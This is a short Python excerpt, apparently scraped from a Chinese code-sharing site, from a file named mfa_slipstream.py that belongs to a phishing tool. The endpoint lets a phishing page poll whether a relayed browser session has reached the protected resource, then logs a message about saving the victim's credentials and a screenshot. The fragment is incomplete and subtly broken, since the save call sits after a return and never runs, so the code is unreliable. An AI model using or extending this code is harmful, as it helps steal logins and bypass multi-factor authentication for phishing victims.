def checkload():
"""
If the user doesn't have a sign in button, the phishing page will poll
this to see if the page has been loaded
"""
if request.method == 'OPTIONS':
return {}
else:
currentURL = global_driver.current_url
print('Current URL is: '+currentURL)
if currentURL == PROTECTED_RESOURCE:
return '1'
print('Saving creds and screenshot')
time.sleep(3)
quicksave()
else:
return '0'
mfa_slipstream.py 文件源码
python
阅读 22
收藏 0
点赞 0
评论 0
评论列表
文章目录